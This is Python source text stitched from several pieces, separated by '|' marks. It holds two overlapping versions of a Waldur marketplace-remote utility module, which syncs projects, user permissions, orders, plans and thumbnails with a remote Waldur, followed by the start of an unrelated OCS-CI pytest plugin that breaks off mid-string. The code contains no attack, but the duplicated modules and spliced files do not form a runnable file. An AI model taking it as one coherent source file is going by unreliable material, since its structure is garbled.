def get_remote_project(offering, project, client=None):
    """
    Look up the project's counterpart in remote Waldur by backend_id.

    Returns the remote project dict, or None if it does not exist.
    Raises ValidationError when the backend_id matches several projects.
    """
    client = client or get_client_for_offering(offering)
    matches = client.list_projects({'backend_id': get_project_backend_id(project)})
    if not matches:
        return None
    if len(matches) > 1:
        raise ValidationError('There are multiple projects in remote Waldur.')
    return matches[0]
def create_remote_project(offering, project, client=None):
    """
    Create the project's counterpart in remote Waldur and return the
    remote project representation.
    """
    client = client or get_client_for_offering(offering)
    return client.create_project(
        customer_uuid=offering.secret_options['customer_uuid'],
        name='{} / {}'.format(project.customer.name, project.name),
        backend_id=get_project_backend_id(project),
        description=project.description,
        end_date=project.end_date.isoformat() if project.end_date else project.end_date,
        oecd_fos_2007_code=project.oecd_fos_2007_code,
        is_industry=project.is_industry,
        type_uuid=project.type.uuid.hex if project.type else project.type,
    )
def get_or_create_remote_project(offering, project, client=None):
    """
    Return a (remote_project, created) pair; ``created`` tells whether a
    new remote project had to be provisioned.
    """
    existing = get_remote_project(offering, project, client)
    if existing:
        return existing, False
    return create_remote_project(offering, project, client), True
def update_remote_project(request):
    """
    Push updated project details to remote Waldur, but only when at least
    one field actually differs from the remote copy.
    """
    client = get_client_for_offering(request.offering)
    backend_id = get_project_backend_id(request.project)

    remote_projects = client.list_projects({'backend_id': backend_id})
    if len(remote_projects) != 1:
        return
    remote_project = remote_projects[0]

    payload = {
        'name': f'{request.project.customer.name} / {request.new_name}',
        'description': request.new_description,
        'end_date': request.new_end_date and request.new_end_date.isoformat(),
        'oecd_fos_2007_code': request.new_oecd_fos_2007_code,
        'is_industry': request.new_is_industry,
    }
    for key, value in payload.items():
        if remote_project.get(key) != value:
            client.update_project(project_uuid=remote_project['uuid'], **payload)
            break
def create_or_update_project_permission(
    client, remote_project_uuid, remote_user_uuid, role, expiration_time
):
    """
    Ensure the remote user has the given role on the remote project with
    the given expiration time, creating or updating the permission as
    needed. Returns the client response, or None if nothing changed.
    """
    serialized_expiration = (
        expiration_time.isoformat() if expiration_time else expiration_time
    )

    permissions = client.get_project_permissions(
        remote_project_uuid, remote_user_uuid, role
    )
    if not permissions:
        return client.create_project_permission(
            remote_user_uuid, remote_project_uuid, role, serialized_expiration
        )

    permission = permissions[0]
    raw_expiration = permission['expiration_time']
    old_expiration = (
        dateparse.parse_datetime(raw_expiration) if raw_expiration else raw_expiration
    )
    if old_expiration != expiration_time:
        return client.update_project_permission(
            permission['pk'], serialized_expiration
        )
def remove_project_permission(client, remote_project_uuid, remote_user_uuid, role):
    """
    Drop the matching remote permission if present.

    Returns True when a permission was removed, False otherwise.
    """
    permissions = client.get_project_permissions(
        remote_project_uuid, remote_user_uuid, role
    )
    if not permissions:
        return False
    client.remove_project_permission(permissions[0]['pk'])
    return True
def sync_project_permission(grant, project, role, user, expiration_time):
    """
    Propagate a single local permission change to every remote offering
    used by the project.

    Args:
        grant: True to create/update the remote permission, False to
            remove it.
        project: local project whose permission changed.
        role: role to grant or revoke remotely.
        user: local user; matched remotely via the eduteams username.
        expiration_time: optional datetime limiting the permission.

    All remote failures are logged at debug level and skipped so one
    broken offering does not block synchronisation of the others.
    """
    for offering in get_remote_offerings_for_project(project):
        client = get_client_for_offering(offering)
        try:
            remote_user_uuid = client.get_remote_eduteams_user(user.username)['uuid']
        except WaldurClientException as e:
            logger.debug(
                f'Unable to fetch remote user {user.username} in offering {offering}: {e}'
            )
            continue
        try:
            remote_project, _ = get_or_create_remote_project(offering, project, client)
            remote_project_uuid = remote_project['uuid']
        except WaldurClientException as e:
            logger.debug(
                f'Unable to create remote project {project} in offering {offering}: {e}'
            )
            continue
        if grant:
            try:
                create_or_update_project_permission(
                    client,
                    remote_project_uuid,
                    remote_user_uuid,
                    role,
                    expiration_time,
                )
            except WaldurClientException as e:
                logger.debug(
                    f'Unable to create permission for user [{remote_user_uuid}] with role {role} (until {expiration_time}) '
                    f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
                )
        else:
            try:
                remove_project_permission(
                    client, remote_project_uuid, remote_user_uuid, role
                )
            except WaldurClientException as e:
                logger.debug(
                    f'Unable to remove permission for user [{remote_user_uuid}] with role {role} '
                    f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
                )
def push_project_users(offering, project, remote_project_uuid):
    """
    Mirror all local eduteams-based project permissions onto the remote
    project, creating or updating remote permissions one user at a time.

    Users that cannot be resolved remotely, and per-user remote failures,
    are logged at debug level and skipped.
    """
    client = get_client_for_offering(offering)
    permissions = collect_local_permissions(offering, project)
    for username, (role, expiration_time) in permissions.items():
        try:
            remote_user_uuid = client.get_remote_eduteams_user(username)['uuid']
        except WaldurClientException as e:
            logger.debug(
                f'Unable to fetch remote user {username} in offering {offering}: {e}'
            )
            continue
        try:
            create_or_update_project_permission(
                client, remote_project_uuid, remote_user_uuid, role, expiration_time
            )
        except WaldurClientException as e:
            logger.debug(
                f'Unable to create permission for user [{remote_user_uuid}] with role {role} '
                f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
            )
def collect_local_permissions(offering, project):
    """
    Build the map of local eduteams users that should have access to the
    project's remote counterpart.

    Returns:
        dict mapping username -> (role, expiration_time).
    """
    permissions = defaultdict()
    for permission in structure_models.ProjectPermission.objects.filter(
        project=project, is_active=True, user__registration_method='eduteams'
    ):
        permissions[permission.user.username] = (
            permission.role,
            permission.expiration_time,
        )

    # Skip mapping for owners if offering belongs to the same customer
    if offering.customer == project.customer:
        return permissions

    for permission in structure_models.CustomerPermission.objects.filter(
        customer=project.customer,
        is_active=True,
        role=structure_models.CustomerRole.OWNER,
        user__registration_method='eduteams',
    ):
        # Organization owner is mapped to project manager in remote Waldur
        permissions[permission.user.username] = (
            structure_models.ProjectRole.MANAGER,
            permission.expiration_time,
        )
    return permissions
def parse_resource_state(serialized_state):
    """Map a serialized resource state label back to its numeric value."""
    reverse_map = {
        label: value for value, label in marketplace_models.Resource.States.CHOICES
    }
    return reverse_map[serialized_state]
def parse_order_state(serialized_state):
    """Map a serialized order state label back to its numeric value."""
    reverse_map = {
        label: value for value, label in marketplace_models.Order.States.CHOICES
    }
    return reverse_map[serialized_state]
def parse_order_item_state(serialized_state):
    """Map a serialized order item state label back to its numeric value."""
    reverse_map = {
        label: value for value, label in marketplace_models.OrderItem.States.CHOICES
    }
    return reverse_map[serialized_state]
def parse_order_item_type(serialized_state):
    """Translate a human-readable order-item type label into its numeric code."""
    label_to_code = {label: code for code, label in marketplace_models.OrderItem.Types.CHOICES}
    return label_to_code[serialized_state]
def import_order(remote_order, project):
    """Create a local marketplace Order mirroring the serialized *remote_order*.

    The order is attributed to the system robot both as creator and approver.
    ``approved_at`` is optional in the remote payload and defaults to ``None``.
    """
    # Conditional expression instead of the fragile ``cond and a or b`` idiom.
    approved_at = (
        parse_datetime(remote_order['approved_at'])
        if 'approved_at' in remote_order
        else None
    )
    return marketplace_models.Order.objects.create(
        project=project,
        state=parse_order_state(remote_order['state']),
        created_by=get_system_robot(),
        created=parse_datetime(remote_order['created']),
        approved_by=get_system_robot(),
        approved_at=approved_at,
    )
def import_order_item(remote_order_item, local_order, resource, remote_order_uuid):
    """Create a local OrderItem mirroring *remote_order_item* of *local_order*.

    The remote Order uuid is stored as the local item's ``backend_id`` so that
    already-imported orders can be recognized later (see get_new_order_ids).
    """
    return marketplace_models.OrderItem.objects.create(
        order=local_order,
        resource=resource,
        type=parse_order_item_type(remote_order_item['type']),
        offering=resource.offering,
        # NB: As a backend_id of local OrderItem, uuid of a remote Order is used
        backend_id=remote_order_uuid,
        attributes=remote_order_item.get('attributes', {}),
        error_message=remote_order_item.get('error_message', ''),
        error_traceback=remote_order_item.get('error_traceback', ''),
        state=parse_order_item_state(remote_order_item['state']),
        created=parse_datetime(remote_order_item['created']),
        reviewed_by=get_system_robot(),
    )
def get_new_order_ids(client, backend_id):
    """Return uuids of remote orders for *backend_id* not yet imported locally.

    Local OrderItems store the remote order uuid in ``backend_id``, so the set
    difference yields only orders that still have to be imported.
    """
    remote_order_items = client.list_order_items(
        {'resource_uuid': backend_id, 'field': ['order_uuid']}
    )
    local_order_ids = set(
        marketplace_models.OrderItem.objects.filter(
            resource__backend_id=backend_id
        ).values_list('backend_id', flat=True)
    )
    remote_order_ids = {order_item['order_uuid'] for order_item in remote_order_items}
    return remote_order_ids - local_order_ids
def import_resource_order_items(resource):
    """Import all not-yet-imported remote orders and their items for *resource*.

    Returns:
        list: newly created local OrderItem objects (empty when the resource
        has no backend_id).
    """
    if not resource.backend_id:
        return []
    client = get_client_for_offering(resource.offering)
    new_order_ids = get_new_order_ids(client, resource.backend_id)
    imported_order_items = []
    for order_id in new_order_ids:
        remote_order = client.get_order(order_id)
        local_order = import_order(remote_order, resource.project)
        for remote_order_item in remote_order['items']:
            local_order_item = import_order_item(
                remote_order_item, local_order, resource, order_id
            )
            imported_order_items.append(local_order_item)
    return imported_order_items
def pull_resource_state(local_resource):
    """Synchronize the local resource state with its remote counterpart."""
    if not local_resource.backend_id:
        return
    client = get_client_for_offering(local_resource.offering)
    remote_resource = client.get_marketplace_resource(local_resource.backend_id)
    new_state = parse_resource_state(remote_resource['state'])
    if new_state == local_resource.state:
        return
    local_resource.state = new_state
    local_resource.save(update_fields=['state'])
def import_offering_components(local_offering, remote_offering):
    """Create local OfferingComponents mirroring the remote offering's ones.

    Returns:
        dict: component type -> newly created local OfferingComponent.
    """
    local_components_map = {}
    for remote_component in remote_offering['components']:
        local_component = marketplace_models.OfferingComponent.objects.create(
            offering=local_offering,
            **{key: remote_component[key] for key in OFFERING_COMPONENT_FIELDS},
        )
        local_components_map[local_component.type] = local_component
        logger.info(
            'Component %s (type: %s) for offering %s has been created',
            local_component,
            local_component.type,
            local_offering,
        )
    return local_components_map
def import_plans(local_offering, remote_offering, local_components_map):
    """Create local Plans (with their PlanComponents) mirroring the remote
    offering's plans.

    Args:
        local_offering: local marketplace Offering the plans are attached to.
        remote_offering: serialized remote offering containing 'plans'.
        local_components_map: component type -> local OfferingComponent, as
            returned by import_offering_components.
    """
    for remote_plan in remote_offering['plans']:
        local_plan = marketplace_models.Plan.objects.create(
            offering=local_offering,
            backend_id=remote_plan['uuid'],
            **{key: remote_plan[key] for key in PLAN_FIELDS},
        )
        remote_prices = remote_plan['prices']
        remote_quotas = remote_plan['quotas']
        # A component may appear in only one of the two mappings; we iterate
        # their union, so fall back to 0 instead of raising KeyError for the
        # mapping that lacks the component.
        components = set(remote_prices.keys()) | set(remote_quotas.keys())
        for component_type in components:
            plan_component = marketplace_models.PlanComponent.objects.create(
                plan=local_plan,
                component=local_components_map[component_type],
                price=remote_prices.get(component_type, 0),
                amount=remote_quotas.get(component_type, 0),
            )
            logger.info(
                'Plan component %s in offering %s has been created',
                plan_component,
                local_offering,
            )
def import_offering_thumbnail(local_offering, remote_offering):
    """Download the remote offering's thumbnail and store it on the local
    offering; delete the local thumbnail when the remote one is absent.
    """
    thumbnail_url = remote_offering['thumbnail']
    if thumbnail_url:
        # Bounded timeout and explicit status check: previously an HTTP error
        # page could silently be saved as the thumbnail image.
        thumbnail_resp = requests.get(thumbnail_url, timeout=30)
        thumbnail_resp.raise_for_status()
        content = io.BytesIO(thumbnail_resp.content)
        file_name = urllib3.util.parse_url(thumbnail_url).path.split('/')[-1]
        local_offering.thumbnail.save(file_name, content)
    else:
        local_offering.thumbnail.delete()
        local_offering.save(update_fields=['thumbnail'])
| import io
import logging
from collections import defaultdict
import requests
import urllib3
from django.utils import dateparse
from django.utils.dateparse import parse_datetime
from rest_framework.exceptions import ValidationError
from waldur_client import WaldurClient, WaldurClientException
from waldur_core.core.utils import get_system_robot
from waldur_core.structure import models as structure_models
from waldur_mastermind.marketplace import models as marketplace_models
from waldur_mastermind.marketplace_remote.constants import (
OFFERING_COMPONENT_FIELDS,
PLAN_FIELDS,
)
from . import PLUGIN_NAME
logger = logging.getLogger(__name__)
# Resources in these states are ignored when looking for projects/offerings
# that need remote synchronization (see get_remote_offerings_for_project and
# get_projects_with_remote_offerings).
INVALID_RESOURCE_STATES = (
    marketplace_models.Resource.States.CREATING,
    marketplace_models.Resource.States.TERMINATED,
)
def get_client_for_offering(offering):
    """Build a WaldurClient from the API URL and token kept in the offering's
    secret options.
    """
    secret_options = offering.secret_options
    return WaldurClient(secret_options['api_url'], secret_options['token'])
def get_project_backend_id(project):
    """Derive the remote backend_id for *project*: ``<customer uuid>_<project uuid>``."""
    customer_uuid = project.customer.uuid
    project_uuid = project.uuid
    return f'{customer_uuid}_{project_uuid}'
def pull_fields(fields, local_object, remote_object):
    """Copy the listed fields from *remote_object* (a mapping) onto *local_object*.

    Only fields whose values actually differ are written; the local object is
    saved once with ``update_fields`` when anything changed.

    Returns:
        set: names of the fields that were updated.
    """
    changed_fields = {
        field
        for field in fields
        if remote_object[field] != getattr(local_object, field)
    }
    for field in changed_fields:
        setattr(local_object, field, remote_object[field])
    if changed_fields:
        local_object.save(update_fields=changed_fields)
    return changed_fields
def get_remote_offerings_for_project(project):
    """Return active remote-plugin offerings that have at least one usable
    resource (i.e. not in INVALID_RESOURCE_STATES) in *project*.
    """
    offering_ids = (
        marketplace_models.Resource.objects.filter(
            project=project,
            offering__type=PLUGIN_NAME,
            offering__state=marketplace_models.Offering.States.ACTIVE,
        )
        .exclude(state__in=INVALID_RESOURCE_STATES)
        .values_list('offering', flat=True)
        .distinct()
    )
    return marketplace_models.Offering.objects.filter(pk__in=offering_ids)
def get_projects_with_remote_offerings():
    """Build a mapping of local projects to the remote-plugin offerings they use.

    Both existing (usable) resources and pending/executing order items are
    considered, so projects that only have in-flight orders are included too.
    Rows referencing removed projects are skipped with a debug log entry.

    Returns:
        defaultdict: project -> set of offerings.
    """
    projects_with_offerings = defaultdict(set)
    # (offering, project) pairs coming from existing resources.
    resource_pairs = (
        marketplace_models.Resource.objects.filter(offering__type=PLUGIN_NAME)
        .exclude(state__in=INVALID_RESOURCE_STATES)
        .values('offering', 'project')
        .distinct()
    )
    for pair in resource_pairs:
        try:
            project = structure_models.Project.available_objects.get(pk=pair['project'])
        except structure_models.Project.DoesNotExist:
            logger.debug(
                f'Skipping resource from a removed project with PK {pair["project"]}'
            )
            continue
        offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
        projects_with_offerings[project].add(offering)
    # (offering, project) pairs coming from orders that are still in flight.
    order_item_pairs = (
        marketplace_models.OrderItem.objects.filter(
            offering__type=PLUGIN_NAME,
            state__in=(
                marketplace_models.OrderItem.States.PENDING,
                marketplace_models.OrderItem.States.EXECUTING,
            ),
        )
        .values('offering', 'order__project')
        .distinct()
    )
    for pair in order_item_pairs:
        try:
            project = structure_models.Project.available_objects.get(
                pk=pair['order__project']
            )
        except structure_models.Project.DoesNotExist:
            logger.debug(
                f'Skipping order item from a removed project with PK {pair["order__project"]}'
            )
            continue
        offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
        projects_with_offerings[project].add(offering)
    return projects_with_offerings
def get_remote_project(offering, project, client=None):
    """Look up the remote project matching *project* by its backend_id.

    Returns:
        dict or None: the single matching remote project, or ``None`` when
        no remote project exists yet.

    Raises:
        ValidationError: if several remote projects share the backend_id.
    """
    client = client or get_client_for_offering(offering)
    backend_id = get_project_backend_id(project)
    matches = client.list_projects({'backend_id': backend_id})
    if not matches:
        return None
    if len(matches) > 1:
        raise ValidationError('There are multiple projects in remote Waldur.')
    return matches[0]
def create_remote_project(offering, project, client=None):
    """Create a project in the remote Waldur mirroring the local *project*.

    The remote project is placed under the customer configured in the
    offering's secret options and tagged with the deterministic backend_id
    derived from the local customer/project uuids.
    """
    client = client or get_client_for_offering(offering)
    remote_customer_uuid = offering.secret_options['customer_uuid']
    return client.create_project(
        customer_uuid=remote_customer_uuid,
        name=f'{project.customer.name} / {project.name}',
        backend_id=get_project_backend_id(project),
        description=project.description,
        end_date=project.end_date.isoformat() if project.end_date else project.end_date,
        oecd_fos_2007_code=project.oecd_fos_2007_code,
        is_industry=project.is_industry,
        type_uuid=project.type.uuid.hex if project.type else project.type,
    )
def get_or_create_remote_project(offering, project, client=None):
    """Fetch the remote counterpart of *project*, creating it when missing.

    Returns:
        tuple: (remote project dict, created flag — True when just created).
    """
    existing = get_remote_project(offering, project, client)
    if existing:
        return existing, False
    return create_remote_project(offering, project, client), True
def update_remote_project(request):
    """Push the fields of a local project-update *request* to the matching
    remote project, skipping the API call when nothing actually differs.
    """
    client = get_client_for_offering(request.offering)
    backend_id = get_project_backend_id(request.project)
    candidates = client.list_projects({'backend_id': backend_id})
    if len(candidates) != 1:
        return
    remote_project = candidates[0]
    payload = {
        'name': f'{request.project.customer.name} / {request.new_name}',
        'description': request.new_description,
        'end_date': request.new_end_date.isoformat()
        if request.new_end_date
        else request.new_end_date,
        'oecd_fos_2007_code': request.new_oecd_fos_2007_code,
        'is_industry': request.new_is_industry,
    }
    if any(remote_project.get(key) != value for key, value in payload.items()):
        client.update_project(project_uuid=remote_project['uuid'], **payload)
def create_or_update_project_permission(
    client, remote_project_uuid, remote_user_uuid, role, expiration_time
):
    """Grant *role* on the remote project, or refresh the expiration time of
    an existing grant when it differs.

    ``expiration_time`` may be ``None`` (no expiration); it is serialized to
    ISO format only when set.
    """
    serialized_expiration = (
        expiration_time.isoformat() if expiration_time else expiration_time
    )
    existing = client.get_project_permissions(
        remote_project_uuid, remote_user_uuid, role
    )
    if not existing:
        return client.create_project_permission(
            remote_user_uuid,
            remote_project_uuid,
            role,
            serialized_expiration,
        )
    permission = existing[0]
    raw_expiration = permission['expiration_time']
    current_expiration = (
        dateparse.parse_datetime(raw_expiration) if raw_expiration else raw_expiration
    )
    if current_expiration != expiration_time:
        return client.update_project_permission(
            permission['pk'],
            serialized_expiration,
        )
def remove_project_permission(client, remote_project_uuid, remote_user_uuid, role):
    """Revoke *role* of the remote user on the remote project, if granted.

    Returns:
        bool: True when a permission was found and removed, False otherwise.
    """
    matches = client.get_project_permissions(
        remote_project_uuid, remote_user_uuid, role
    )
    if not matches:
        return False
    client.remove_project_permission(matches[0]['pk'])
    return True
def sync_project_permission(grant, project, role, user, expiration_time):
    """Propagate a local permission change to every remote offering of *project*.

    Args:
        grant (bool): True to create/update the permission remotely,
            False to remove it.
        project: local project whose permission changed.
        role: role to grant or revoke.
        user: local user; must resolve to a remote eduteams user.
        expiration_time: optional expiration of the granted permission.

    Per-offering failures (user lookup, project creation, permission call)
    are logged at debug level and skipped so one offering cannot block the
    synchronization of the others.
    """
    for offering in get_remote_offerings_for_project(project):
        client = get_client_for_offering(offering)
        try:
            remote_user_uuid = client.get_remote_eduteams_user(user.username)['uuid']
        except WaldurClientException as e:
            logger.debug(
                f'Unable to fetch remote user {user.username} in offering {offering}: {e}'
            )
            continue
        try:
            # The remote project is created lazily on the first grant.
            remote_project, _ = get_or_create_remote_project(offering, project, client)
            remote_project_uuid = remote_project['uuid']
        except WaldurClientException as e:
            logger.debug(
                f'Unable to create remote project {project} in offering {offering}: {e}'
            )
            continue
        if grant:
            try:
                create_or_update_project_permission(
                    client,
                    remote_project_uuid,
                    remote_user_uuid,
                    role,
                    expiration_time,
                )
            except WaldurClientException as e:
                logger.debug(
                    f'Unable to create permission for user [{remote_user_uuid}] with role {role} (until {expiration_time}) '
                    f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
                )
        else:
            try:
                remove_project_permission(
                    client, remote_project_uuid, remote_user_uuid, role
                )
            except WaldurClientException as e:
                logger.debug(
                    f'Unable to remove permission for user [{remote_user_uuid}] with role {role} '
                    f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
                )
def push_project_users(offering, project, remote_project_uuid):
    """Replicate local eduteams-user permissions for *project* onto the remote
    project identified by *remote_project_uuid*, skipping users that fail.
    """
    client = get_client_for_offering(offering)
    local_permissions = collect_local_permissions(offering, project)
    for username, (role, expiration_time) in local_permissions.items():
        try:
            remote_user_uuid = client.get_remote_eduteams_user(username)['uuid']
        except WaldurClientException as e:
            logger.debug(
                f'Unable to fetch remote user {username} in offering {offering}: {e}'
            )
            continue
        try:
            create_or_update_project_permission(
                client, remote_project_uuid, remote_user_uuid, role, expiration_time
            )
        except WaldurClientException as e:
            logger.debug(
                f'Unable to create permission for user [{remote_user_uuid}] with role {role} '
                f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
            )
def collect_local_permissions(offering, project):
    """Collect local permissions of eduteams-registered users for *project*.

    Returns:
        dict: username -> (role, expiration_time).  Active project permissions
        are collected first; when the offering belongs to a different customer
        than the project, active owners of the project's customer are
        additionally mapped to the project-manager role (overriding a
        project-level entry for the same username).
    """
    # A plain dict is enough: the previous ``defaultdict()`` had no default
    # factory and therefore behaved exactly like ``dict`` anyway.
    permissions = {}
    for permission in structure_models.ProjectPermission.objects.filter(
        project=project, is_active=True, user__registration_method='eduteams'
    ):
        permissions[permission.user.username] = (
            permission.role,
            permission.expiration_time,
        )
    # Skip mapping for owners if offering belongs to the same customer
    if offering.customer == project.customer:
        return permissions
    for permission in structure_models.CustomerPermission.objects.filter(
        customer=project.customer,
        is_active=True,
        role=structure_models.CustomerRole.OWNER,
        user__registration_method='eduteams',
    ):
        # Organization owner is mapped to project manager in remote Waldur
        permissions[permission.user.username] = (
            structure_models.ProjectRole.MANAGER,
            permission.expiration_time,
        )
    return permissions
def parse_resource_state(serialized_state):
    """Translate a human-readable resource state label into its numeric code."""
    label_to_code = {label: code for code, label in marketplace_models.Resource.States.CHOICES}
    return label_to_code[serialized_state]
def parse_order_state(serialized_state):
    """Translate a human-readable order state label into its numeric code."""
    label_to_code = {label: code for code, label in marketplace_models.Order.States.CHOICES}
    return label_to_code[serialized_state]
def parse_order_item_state(serialized_state):
    """Translate a human-readable order-item state label into its numeric code."""
    label_to_code = {label: code for code, label in marketplace_models.OrderItem.States.CHOICES}
    return label_to_code[serialized_state]
def parse_order_item_type(serialized_state):
    """Translate a human-readable order-item type label into its numeric code."""
    label_to_code = {label: code for code, label in marketplace_models.OrderItem.Types.CHOICES}
    return label_to_code[serialized_state]
def import_order(remote_order, project):
    """Create a local marketplace Order mirroring the serialized *remote_order*.

    The order is attributed to the system robot both as creator and approver.
    ``approved_at`` is optional in the remote payload and defaults to ``None``.
    """
    # Conditional expression instead of the fragile ``cond and a or b`` idiom.
    approved_at = (
        parse_datetime(remote_order['approved_at'])
        if 'approved_at' in remote_order
        else None
    )
    return marketplace_models.Order.objects.create(
        project=project,
        state=parse_order_state(remote_order['state']),
        created_by=get_system_robot(),
        created=parse_datetime(remote_order['created']),
        approved_by=get_system_robot(),
        approved_at=approved_at,
    )
def import_order_item(remote_order_item, local_order, resource, remote_order_uuid):
    """Create a local OrderItem mirroring *remote_order_item* of *local_order*.

    The remote Order uuid is stored as the local item's ``backend_id`` so that
    already-imported orders can be recognized later (see get_new_order_ids).
    """
    item_fields = dict(
        order=local_order,
        resource=resource,
        type=parse_order_item_type(remote_order_item['type']),
        offering=resource.offering,
        # NB: As a backend_id of local OrderItem, uuid of a remote Order is used
        backend_id=remote_order_uuid,
        attributes=remote_order_item.get('attributes', {}),
        error_message=remote_order_item.get('error_message', ''),
        error_traceback=remote_order_item.get('error_traceback', ''),
        state=parse_order_item_state(remote_order_item['state']),
        created=parse_datetime(remote_order_item['created']),
        reviewed_by=get_system_robot(),
    )
    return marketplace_models.OrderItem.objects.create(**item_fields)
def get_new_order_ids(client, backend_id):
    """Return uuids of remote orders for *backend_id* not yet imported locally.

    Local OrderItems store the remote order uuid in ``backend_id``, so the set
    difference yields only orders that still have to be imported.
    """
    remote_ids = {
        item['order_uuid']
        for item in client.list_order_items(
            {'resource_uuid': backend_id, 'field': ['order_uuid']}
        )
    }
    known_ids = set(
        marketplace_models.OrderItem.objects.filter(
            resource__backend_id=backend_id
        ).values_list('backend_id', flat=True)
    )
    return remote_ids - known_ids
def import_resource_order_items(resource):
    """Import all not-yet-imported remote orders and their items for *resource*.

    Returns:
        list: newly created local OrderItem objects (empty when the resource
        has no backend_id).
    """
    if not resource.backend_id:
        return []
    client = get_client_for_offering(resource.offering)
    imported_items = []
    for order_id in get_new_order_ids(client, resource.backend_id):
        remote_order = client.get_order(order_id)
        local_order = import_order(remote_order, resource.project)
        imported_items.extend(
            import_order_item(remote_order_item, local_order, resource, order_id)
            for remote_order_item in remote_order['items']
        )
    return imported_items
def pull_resource_state(local_resource):
    """Synchronize the local resource state with its remote counterpart."""
    if not local_resource.backend_id:
        return
    client = get_client_for_offering(local_resource.offering)
    remote_resource = client.get_marketplace_resource(local_resource.backend_id)
    new_state = parse_resource_state(remote_resource['state'])
    if new_state == local_resource.state:
        return
    local_resource.state = new_state
    local_resource.save(update_fields=['state'])
def import_offering_components(local_offering, remote_offering):
    """Create local OfferingComponents mirroring the remote offering's ones.

    Returns:
        dict: component type -> newly created local OfferingComponent.
    """
    components_by_type = {}
    for remote_component in remote_offering['components']:
        attrs = {key: remote_component[key] for key in OFFERING_COMPONENT_FIELDS}
        component = marketplace_models.OfferingComponent.objects.create(
            offering=local_offering, **attrs
        )
        components_by_type[component.type] = component
        logger.info(
            'Component %s (type: %s) for offering %s has been created',
            component,
            component.type,
            local_offering,
        )
    return components_by_type
def import_plans(local_offering, remote_offering, local_components_map):
    """Create local Plans (with their PlanComponents) mirroring the remote
    offering's plans.

    Args:
        local_offering: local marketplace Offering the plans are attached to.
        remote_offering: serialized remote offering containing 'plans'.
        local_components_map: component type -> local OfferingComponent, as
            returned by import_offering_components.
    """
    for remote_plan in remote_offering['plans']:
        local_plan = marketplace_models.Plan.objects.create(
            offering=local_offering,
            backend_id=remote_plan['uuid'],
            **{key: remote_plan[key] for key in PLAN_FIELDS},
        )
        remote_prices = remote_plan['prices']
        remote_quotas = remote_plan['quotas']
        # A component may appear in only one of the two mappings; we iterate
        # their union, so fall back to 0 instead of raising KeyError for the
        # mapping that lacks the component.
        components = set(remote_prices.keys()) | set(remote_quotas.keys())
        for component_type in components:
            plan_component = marketplace_models.PlanComponent.objects.create(
                plan=local_plan,
                component=local_components_map[component_type],
                price=remote_prices.get(component_type, 0),
                amount=remote_quotas.get(component_type, 0),
            )
            logger.info(
                'Plan component %s in offering %s has been created',
                plan_component,
                local_offering,
            )
def import_offering_thumbnail(local_offering, remote_offering):
    """Download the remote offering's thumbnail and store it on the local
    offering; delete the local thumbnail when the remote one is absent.
    """
    thumbnail_url = remote_offering['thumbnail']
    if thumbnail_url:
        # Bounded timeout and explicit status check: previously an HTTP error
        # page could silently be saved as the thumbnail image.
        thumbnail_resp = requests.get(thumbnail_url, timeout=30)
        thumbnail_resp.raise_for_status()
        content = io.BytesIO(thumbnail_resp.content)
        file_name = urllib3.util.parse_url(thumbnail_url).path.split('/')[-1]
        local_offering.thumbnail.save(file_name, content)
    else:
        local_offering.thumbnail.delete()
        local_offering.save(update_fields=['thumbnail'])
|
"""
This is plugin for all the plugins/hooks related to OCS-CI and its
configuration.
The basic configuration is done in run_ocsci.py module casue we need to load
all the config before pytest run. This run_ocsci.py is just a wrapper for
pytest which proccess config and passes all params to pytest.
"""
import logging
import os
import pytest
from junitparser import JUnitXml
from ocs_ci.framework import config as ocsci_config
from ocs_ci.framework.exceptions import (
ClusterNameLengthError,
ClusterNameNotProvidedError,
ClusterPathNotProvidedError,
)
from ocs_ci.ocs.constants import (
CLUSTER_NAME_MAX_CHARACTERS,
CLUSTER_NAME_MIN_CHARACTERS,
LOG_FORMAT,
OCP_VERSION_CONF_DIR,
)
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceNotFoundError,
)
from ocs_ci.ocs.resources.ocs import get_version_info
from ocs_ci.ocs.utils import collect_ocs_logs, collect_prometheus_metrics
from ocs_ci.utility.utils import (
dump_config_to_file,
get_ceph_version,
get_cluster_name,
get_cluster_version,
get_csi_versions,
get_ocs_build_number,
get_testrun_name,
load_config_file,
)
from ocs_ci.utility.reporting import update_live_must_gather_image
__all__ = [
"pytest_addoption",
]
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(LOG_FORMAT))
log.addHandler(handler)
def _pytest_addoption_cluster_specific(parser):
    """
    Handle multicluster options here
    We will add options which will have suffix number same as its cluster number
    i.e `--cluster1 --cluster-name xyz --cluster-path /a/b/c --ocsci-conf /path/to/c1
    --ocsci-conf /path/to/c2...` will get translated to `--cluster1 --cluster-name1 xyz
    --cluster-path1 /a/b/c --ocsci-conf1 /path/to/c1 --ocsci-conf1 /path/to/c2`

    Rest of the general run-ci options will be handled by pytest_addoption

    Args:
        parser: pytest options parser the cluster-specific options are
            registered on.
    """
    # Plain (un-suffixed) --ocsci-conf must be registered exactly once in
    # multicluster mode; this flag ensures that.
    add_common_ocsci_conf = False
    for i in range(ocsci_config.nclusters):
        # If it's not multicluster then no suffix will be added
        suffix = i + 1 if ocsci_config.multicluster else ""
        if not add_common_ocsci_conf and ocsci_config.multicluster:
            parser.addoption(
                "--ocsci-conf",
                dest="ocsci_conf",
                action="append",
                help="Path to config file of OCS CI",
            )
            add_common_ocsci_conf = True
        # Per-cluster variants: --ocsci-conf1, --cluster-path1, ... for
        # cluster 1 and so on (no suffix in single-cluster mode).
        parser.addoption(
            f"--ocsci-conf{suffix}",
            dest=f"ocsci_conf{suffix}",
            action="append",
            help="Path to config file of OCS CI",
        )
        parser.addoption(
            f"--cluster-path{suffix}",
            dest=f"cluster_path{suffix}",
            help="Path to cluster directory",
        )
        parser.addoption(
            f"--cluster-name{suffix}",
            dest=f"cluster_name{suffix}",
            help="Name of cluster",
        )
        parser.addoption(
            f"--ocs-version{suffix}",
            dest=f"ocs_version{suffix}",
            help="ocs version for which ocs-ci to be run",
        )
        parser.addoption(
            f"--ocp-version{suffix}",
            dest=f"ocp_version{suffix}",
            help="""
